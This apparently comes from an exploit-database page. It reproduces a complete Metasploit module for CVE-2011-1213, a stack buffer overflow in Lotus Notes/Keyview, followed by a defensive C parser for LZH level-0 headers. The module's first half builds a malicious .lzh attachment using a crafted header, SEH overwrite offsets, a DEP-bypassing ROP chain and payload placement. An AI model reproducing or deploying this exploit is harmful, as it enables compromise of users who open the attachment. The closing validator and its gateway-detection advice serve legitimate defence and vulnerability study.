Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)

Reported: 23 Jun 2011 15:43:54 by binaryhouse.net, alino <[email protected]>
Type: metasploit
Source: www.rapid7.com

Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) stack buffer overflow exploit

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when
        parsing a malformed, specially crafted LZH file. This vulnerability was
        discovered by binaryhouse.net.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'binaryhouse.net',		# original discovery
          'alino <26alino[at]gmail.com>',	# Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-1213'],
          ['OSVDB', '72706'],
          ['BID', '48018'],
          ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],
          ['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],
        ],
      'Stance'         => Msf::Exploit::Stance::Passive,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',
            {
              'Offset' => 6741,
              'Ret'    => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
            }
          ],

          [ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
            {
              'Offset' => 6745,
              'Ret'    => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll
            }
          ],
        ],
      'DisclosureDate' => '2011-05-24',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ true, 'The file name.',  'msf.lzh']),
        ])
  end

  def exploit

    header =  "\x08"		# Size of archived file header <-- 8 - 13 = FFFFFFF6
    header << "\x1a"		# 1 byte Header checksum
    header << "-lh0-"		# Method ID (No compression)
    header << "\x7c\x1a\x00\x00"	# Compressed file size
    header << "\x7c\x1a\x00\x00"	# Uncompressed file size
    header << "\xB2\x5e\xab\x3c"	# Original file date/time
    header << "\x20"		# File attribute
    header << "\x00"		# Level identifier
    header << "\x07"		# File name length
    header << "poc.txt"		# File name
    header << "\x25\x7d"		# 16 bit CRC of the uncompressed file

    lzh =  header
    lzh << rand_text(target['Offset'])

    if (target == targets[0])

      lzh << generate_seh_record(target.ret)
      lzh << make_nops(8)
      lzh << payload.encoded

    elsif (target == targets[1])

      rop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll

      rop_gadgets =
      [
        0x60524404, # POP EAX; RETN nnotes.dll
        0x7c37a140, # VirtualProtect()
        0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll
        0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll
        0x60620001, # POP EBP; RETN nnotes.dll
        0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll
        0x7c34280f, # POP EBX; RETN MSVCR71.dll
        0x00001954, # dwSize
        0x780ea001, # POP ECX; RETN MSVCP60.dll
        0x7c38b000, # lpflOldProtect
        0x60e73200, # POP EDI; RETN nnotes.dll
        0x60e73201, # RETN nnotes.dll
        0x601d5f02, # POP EDX; RETN nnotes.dll
        0x00000040, # flNewProtect
        0x60524404, # POP EAX; RETN nnotes.dll
        0x90909090, # NOP
        0x60820801, # PUSHAD; RETN nnotes.dll
      ].pack("V*")

      lzh << [target.ret].pack('V')
      lzh[32, rop_nop.length] = rop_nop
      lzh[220, rop_gadgets.length] = rop_gadgets
      lzh[289, payload.encoded.length] = payload.encoded
    end

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(lzh)
  end
end
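The module's crafted header declares a level-0 header size of 0x08 even though the fixed fields alone (method id through the 2-byte CRC) occupy 22 bytes plus the file name, so any parser that derives a remaining length by subtracting from that byte goes negative and copies far more than it should. The following is an added defender's example, not code from the Metasploit module, from Keyview, or from the Vulners page: a bounds-checked LZH level-0 header parser that rejects an undersized header-size field before any length arithmetic happens, verifies the header checksum, and refuses a name that does not fit inside the declared header. The `lzh_l0_*` names, the struct, and the constructed sample headers are assumptions made for this example; the field layout follows the standard LHA level-0 header.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* LHA level-0 header layout (offsets from the start of the header):
 *  0     header size: number of bytes following the checksum byte
 *  1     header checksum: sum of bytes 2 .. 2+size-1, mod 256
 *  2     method id, 5 bytes, e.g. "-lh0-"
 *  7     compressed size, uint32 little-endian
 * 11     uncompressed size, uint32 little-endian
 * 15     timestamp, 4 bytes
 * 19     attribute, 1 byte
 * 20     header level, 1 byte (0)
 * 21     file name length, 1 byte
 * 22     file name
 * 22+n   CRC16 of the uncompressed data
 */
#define LZH_L0_FIXED 20                 /* method id through name-length byte */
#define LZH_L0_MIN   (LZH_L0_FIXED + 2) /* fixed part + CRC, zero-length name */
#define LZH_NAME_MAX 255

typedef struct {
    uint32_t compressed_size;
    uint32_t uncompressed_size;
    uint8_t  name_len;
    char     name[LZH_NAME_MAX + 1];
    uint16_t crc;
} lzh_l0_header;

enum lzh_status {
    LZH_OK = 0,
    LZH_ERR_TRUNCATED,    /* buffer shorter than the header claims */
    LZH_ERR_HEADER_SIZE,  /* header-size byte smaller than the fixed fields */
    LZH_ERR_CHECKSUM,     /* stored checksum does not match the bytes */
    LZH_ERR_LEVEL,        /* not a level-0 header */
    LZH_ERR_NAME_LEN      /* name + CRC do not fit in the declared size */
};

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Level-0 checksum: byte sum of the header body, truncated to 8 bits. */
uint8_t lzh_l0_checksum(const uint8_t *body, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i++) sum += body[i];
    return (uint8_t)sum;
}

/* Parse one level-0 header from buf. Every length is validated against both
 * the declared header size and the real buffer length before it is used. */
enum lzh_status lzh_l0_parse(const uint8_t *buf, size_t buf_len, lzh_l0_header *out) {
    if (buf_len < 2) return LZH_ERR_TRUNCATED;
    size_t hsize = buf[0];
    /* The check an underflowing parser lacks: the declared size must cover the
     * fixed fields, so "hsize - fixed" can never wrap to a huge copy length. */
    if (hsize < LZH_L0_MIN) return LZH_ERR_HEADER_SIZE;
    if (buf_len < 2 + hsize) return LZH_ERR_TRUNCATED;
    if (lzh_l0_checksum(buf + 2, hsize) != buf[1]) return LZH_ERR_CHECKSUM;
    const uint8_t *p = buf + 2;
    if (p[18] != 0) return LZH_ERR_LEVEL;
    uint8_t name_len = p[19];
    /* Name plus the 2-byte CRC must lie inside the declared header. */
    if ((size_t)LZH_L0_FIXED + name_len + 2 > hsize) return LZH_ERR_NAME_LEN;
    out->compressed_size   = rd32le(p + 5);
    out->uncompressed_size = rd32le(p + 9);
    out->name_len = name_len;
    memcpy(out->name, p + 20, name_len);
    out->name[name_len] = '\0';
    out->crc = (uint16_t)(p[20 + name_len] | (p[21 + name_len] << 8));
    return LZH_OK;
}

/* Build a constructed level-0 header (sample data for this example). When
 * declared_size is 0 the correct size (22 + name length) is written; a non-zero
 * value is stored as-is so a test can reproduce an undersized header-size byte.
 * Returns the number of bytes written, or 0 on a bad argument. */
size_t lzh_l0_build(uint8_t *out, size_t cap, const char *name,
                    uint32_t csize, uint32_t usize, uint8_t declared_size) {
    size_t n = strlen(name);
    size_t total = 2 + LZH_L0_FIXED + n + 2;
    if (n > LZH_NAME_MAX || cap < total) return 0;
    uint8_t *p = out + 2;
    memcpy(p, "-lh0-", 5);           /* stored, no compression */
    wr32le(p + 5, csize);
    wr32le(p + 9, usize);
    memset(p + 13, 0, 4);            /* timestamp: zero for the sample */
    p[17] = 0x20;                    /* attribute */
    p[18] = 0;                       /* level 0 */
    p[19] = (uint8_t)n;
    memcpy(p + 20, name, n);
    p[20 + n] = 0; p[21 + n] = 0;    /* data CRC: zero for the sample */
    out[0] = declared_size ? declared_size : (uint8_t)(LZH_L0_FIXED + n + 2);
    size_t cs = out[0] <= total - 2 ? out[0] : total - 2;
    out[1] = lzh_l0_checksum(p, cs);
    return total;
}

int main(void) {
    uint8_t buf[64];
    lzh_l0_header h;
    size_t n = lzh_l0_build(buf, sizeof buf, "report.txt", 0x1a7c, 0x1a7c, 0);
    printf("well-formed header: status %d, name %s\n", lzh_l0_parse(buf, n, &h), h.name);
    n = lzh_l0_build(buf, sizeof buf, "report.txt", 0x1a7c, 0x1a7c, 8);
    printf("header-size byte 0x08: status %d\n", lzh_l0_parse(buf, n, &h));
    return 0;
}
```

The order of the checks matters: the header-size minimum is tested first, before the buffer length or checksum, so a malformed size byte is rejected without any derived length ever being computed. The same validator can be run over attachment bytes at a mail gateway to flag LZH files whose header-size byte is below the minimum, which is exactly the malformation the module relies on.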
